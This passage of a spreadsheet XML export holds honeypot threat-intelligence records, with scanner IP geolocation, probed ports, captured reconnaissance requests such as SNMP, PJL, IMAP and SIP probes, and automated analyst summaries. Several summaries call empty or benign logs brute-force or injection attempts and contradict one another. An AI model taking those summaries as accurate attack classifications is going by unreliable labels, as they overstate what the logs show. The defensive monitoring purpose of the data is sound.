connection to an email service. This could be an attempt to bypass authentication or probing for vulnerability. Normal email service usage typically involves active connections and communication with the server. &amp;&amp; This log indicates a failed attempt to access a specific service, likely an intrusion or reconnaissance effort. The lack of success suggests the actor may have been probing for vulnerabilities rather than actively exploiting them. This behavior is characteristic of initial stages of a potential attack. &amp;&amp; A GET request was made to the root directory, which could be a reconnaissance attempt or probing for vulnerabilities. This type of activity is often seen as the first step in a larger malicious attack. It may indicate an attacker gathering information about the system's layout and potential entry points. &amp;&amp; A GET request is being made to the root directory of a secure server, potentially indicating reconnaissance or probing activity. This could be an attempt to gather information about the server's contents or configuration. The fact that it's a GET request suggests a non-destructive scan rather than an attack. &amp;&amp; No activity was detected on the SMTP service, suggesting that an attacker may have attempted to use this service but was unsuccessful or undetected. &amp;&amp; The log suggests that an attempt was made to access the SMTP service, but no malicious activity is indicated as the result of this attempt was null (NA). The attempt could be from a legitimate user trying to set up an account or a scanner probing for vulnerabilities. This event alone may not indicate malicious intent. &amp;&amp; No malicious activity reported yet. The log is empty, indicating no suspicious connections or attempts detected. This is expected since no data has been provided for analysis. &amp;&amp; No log data available, unable to determine malicious activity at this time. _x000a_ Lack of data makes it impossible to analyze or confirm any suspicious behavior. _x000a_This indicates that no malicious attempts have been detected so far. &amp;&amp; Unsuccessful attempt to connect to Microsoft SQL Server, possibly a brute-force attack or port scanning. Unknown username and password were used for authentication. No further action was taken by the system. &amp;&amp; This log suggests an attempt to access Microsoft SQL Server, which could be a brute force attack or unauthorized login attempt. The absence of credentials indicates the attacker may have been trying to exploit a vulnerability rather than use stolen login information. This type of activity is indicative of malicious intent to gain unauthorized access to sensitive data. &amp;&amp; Malicious actors are attempting to connect to an IMAP service but are being denied or unable to access it. The lack of activity or failed connections may indicate probing for vulnerabilities or reconnaissance efforts. This could be a precursor to more targeted attacks in the future. &amp;&amp; Possible brute-force attack attempt on IMAP service, with the goal of guessing credentials or gaining unauthorized access to email accounts. The absence of any authentication attempts or actions could indicate a reconnaissance or probing activity. This might be an initial step in a larger malicious campaign. &amp;&amp; A malicious actor is attempting to connect to a service, possibly to gain unauthorized access or steal sensitive information, using a spoofed user agent that mimics a legitimate browser. The request is for the root directory of the service which could be a reconnaissance attempt. &amp;&amp; An unknown user attempted to access the server's root directory using a GET request from an IP address that may be associated with malicious activity. The User-Agent field suggests the connection is coming from a Linux-based system, possibly attempting to mask its true identity. This could be a reconnaissance or initial probing attempt by a potential attacker. &amp;&amp; The data indicates an attempted access to Microsoft SQL Server, which is a common target for malicious activity. This could be an attempt to extract sensitive information or inject malware into the system. The lack of credentials suggests a brute-force attack. &amp;&amp; There is insufficient information available as there is no log data provided. &amp;&amp; There is no log data provided for analysis. &amp;&amp; An empty FTP command was received, which could indicate an attacker probing the system or attempting to exploit a vulnerability. This behavior is often seen in reconnaissance or scanning activities. It may be part of a larger malicious campaign. &amp;&amp; The data suggests a brute-force attempt against an FTP service, as there is no command provided but an empty argument list implies an automated login process. This could be an indication of password guessing or cracking attempts. The absence of a valid command indicates the attacker is likely attempting to log in rather than perform any other action. &amp;&amp; This is a GET request attempting to access a POP3 server, likely trying to exploit a vulnerability for malicious purposes such as spamming or stealing sensitive information. The request includes an HTTP header indicating it's coming from the internet. It appears to be a reconnaissance attempt to identify potential targets for further exploitation. &amp;&amp; Malicious activity detected: an unauthorized GET request was made to a POP3 server, possibly attempting to exploit it for email account access or other malicious purposes._x000a_The request contains an unusual path ('/') and a blank line before the request, suggesting it may be a spoofed or automated attempt._x000a_This could be indicative of an attacker scanning for vulnerable services. &amp;&amp; A user connected to the FTP service and issued a HELP command, which may be an attempt to gather information about available commands or functionality for malicious purposes. This could be an initial reconnaissance step in a larger attack scenario. The command is typically used by legitimate users but can also indicate potential probing behavior. &amp;&amp; The user is attempting to connect to the FTP service, and their first command is a legitimate request for help, which could be an initial scan or reconnaissance. This behavior may indicate a potential attacker probing for vulnerabilities or information disclosure. The use of HELP as the first command suggests a cautious approach by the user. &amp;&amp; Malicious actor is attempting an unauthorized access to a server by sending an HTTP GET request with unusual arguments, possibly trying to exploit a vulnerability or gather information about the system. The request appears to be coming from an unknown source and may be part of a larger reconnaissance activity. This could be indicative of a scanning or probing attempt. &amp;&amp; A GET request is being sent to a server with an unusual HTTP header, indicating possible exploitation of a vulnerability or scanning for weaknesses. The presence of single quotes and parentheses in the request suggests an attempt to inject malicious code. This may be part of a reconnaissance phase to identify vulnerable servers. &amp;&amp; Possible malicious activity: Scanning for potential vulnerabilities on POP3 service, possibly to identify exploitable weaknesses or test firewall rules. The attacker is using an OPTIONS request with an HTTP-style header, indicating a reconnaissance probe. This may be the first step in a larger attack. &amp;&amp; Possible login attempt without any arguments or commands, indicating a potential brute-force attack or reconnaissance. No actual command was executed, suggesting an initial probing activity. This could be the start of a larger malicious operation. &amp;&amp; Potential malicious activity detected: An unknown FTP command was issued, indicating possible probing or exploitation attempts to access unauthorized services._x000a_The absence of a specified command suggests an attempt to exploit a vulnerability by sending an invalid or unexpected instruction._x000a_This may be part of a reconnaissance phase to gather information about the available services. &amp;&amp; Possible malicious activity: An attempt was made to probe a service for potential vulnerabilities, specifically a RTSP server. The OPTIONS command is being used to test the capabilities of the service. This behavior suggests reconnaissance and potential exploitation. &amp;&amp; An unknown client attempted to query available features of a service, potentially reconnaissance or probing for vulnerabilities. This could be an attempt to gather information about the system's capabilities. The target service appears to be related to streaming media."/>
    <s v="SQL Injection &amp;&amp; SQL Attack &amp;&amp; Connection Spoofing &amp;&amp; Scanning Attack &amp;&amp; Port Scan &amp;&amp; FTP scan &amp;&amp; FTP Null Scan &amp;&amp; POP Scanning &amp;&amp; POP Scanning &amp;&amp; Port Scan &amp;&amp; Scanning Attempt &amp;&amp; Fake Login &amp;&amp; No Attack &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Scanning Attack &amp;&amp; Scan Attack &amp;&amp; Scanning Attempt &amp;&amp; Scanning attempt &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; FTP Bruteforce &amp;&amp; FTP Scan &amp;&amp; FTP Scan &amp;&amp; Scanning Probe &amp;&amp; None Given &amp;&amp; FTP Probe &amp;&amp; Port Scan &amp;&amp; Scanning Port"/>
  </r>
  <r>
    <x v="60"/>
    <x v="60"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:10:49"/>
    <d v="2023-11-27T16:25:49"/>
    <d v="2025-04-30T21:10:49"/>
    <n v="230"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_SOCKS5_H20&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;3389&amp;&amp;1433&amp;&amp;5900&amp;&amp;445&amp;&amp;110&amp;&amp;3306&amp;&amp;21&amp;&amp;41980&amp;&amp;5432&amp;&amp;1521&amp;&amp;161&amp;&amp;54672&amp;&amp;9100&amp;&amp;51333&amp;&amp;23&amp;&amp;1080&amp;&amp;143&amp;&amp;6667&amp;&amp;54368&amp;&amp;6379&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=laNhFtvSW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XQAHWt'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_NTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f83"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="61"/>
    <x v="61"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:10:31"/>
    <d v="2024-04-12T19:09:00"/>
    <d v="2025-04-30T21:10:31"/>
    <n v="195"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_SMTP_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;45770&amp;&amp;10014&amp;&amp;25&amp;&amp;3306&amp;&amp;1521&amp;&amp;6379&amp;&amp;9100&amp;&amp;NA&amp;&amp;35035&amp;&amp;161&amp;&amp;389&amp;&amp;23&amp;&amp;5432&amp;&amp;110&amp;&amp;143&amp;&amp;5900&amp;&amp;445&amp;&amp;45050"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20876"/>
    <s v="106.846"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POP3:{'args': 'NTLM', 'cmd': 'AUTH'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,58026)}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,34538)}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,44502)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:9641"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="62"/>
    <x v="62"/>
    <s v="zl-ams-nl-gp1-wk130d.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:10:12"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T21:10:12"/>
    <n v="300"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_LDAP_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;41552&amp;&amp;161&amp;&amp;53&amp;&amp;38195&amp;&amp;6379&amp;&amp;22527&amp;&amp;5432&amp;&amp;1521&amp;&amp;3306&amp;&amp;110&amp;&amp;6667&amp;&amp;389&amp;&amp;21&amp;&amp;443&amp;&amp;9100&amp;&amp;143&amp;&amp;48774&amp;&amp;5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ICG 4 ZEN AMS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.113.33:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MKKL0'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.226.197.45;rport=46534'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.226.197.45;rport=33378'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LCGM0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9e2:c52d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The system was accessed using VNC, indicating unauthorized access may have occurred. The lack of &quot;Data_VNC&quot; value suggests an attempt to connect but no valid credentials were provided or activity was detected. This could be a reconnaissance attempt by a malicious actor. &amp;&amp; The lack of VNC (Virtual Network Computing) connection attempt data suggests that there was no malicious activity detected via this service, but it's possible that the service was never accessed or monitored. However, it could also indicate a missed or blocked connection attempt, worth further investigation to confirm the absence of malicious activity. &amp;&amp; Unknown service attempted connection, potentially malicious login attempt detected. Possible brute-force attack or unauthorized access attempt occurred. Activity may indicate an attempted exploitation of a system vulnerability. &amp;&amp; There is no log data provided, so I have nothing to analyze or report on. &amp;&amp; Malicious activity detected, attempting to access Oracle database credentials. Unsuccessful login attempt with Oracle database related information provided. Indicates potential SQL injection or brute force attack attempt. &amp;&amp; The data suggests that an NTP service is being accessed, possibly for synchronization or to exploit vulnerabilities in the service. The fact that no data was received indicates either a legitimate request or a malicious attempt to gather information. An attacker might be probing the system's clock settings. &amp;&amp; No attempt made to synchronize time with server, possible time manipulation or probing for vulnerable NTP services. _x000a_Indicates potential scanning of system clock synchronization mechanisms. _x000a_May be reconnaissance activity before attempting other malicious actions. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity."/>
    <s v="VNC Attack &amp;&amp; VNC Attack"/>
  </r>
  <r>
    <x v="63"/>
    <x v="63"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:10:06"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T21:10:06"/>
    <n v="299"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;3389&amp;&amp;NA&amp;&amp;25&amp;&amp;143&amp;&amp;5432&amp;&amp;1433&amp;&amp;23&amp;&amp;110&amp;&amp;443&amp;&amp;9100&amp;&amp;8443&amp;&amp;21&amp;&amp;445&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.145;rport=55697'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 45.14.244.111:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.145,55030)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.145,56466)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.118.29:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (CrCmaXwD,)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.253.43.207:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.233.76.135:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
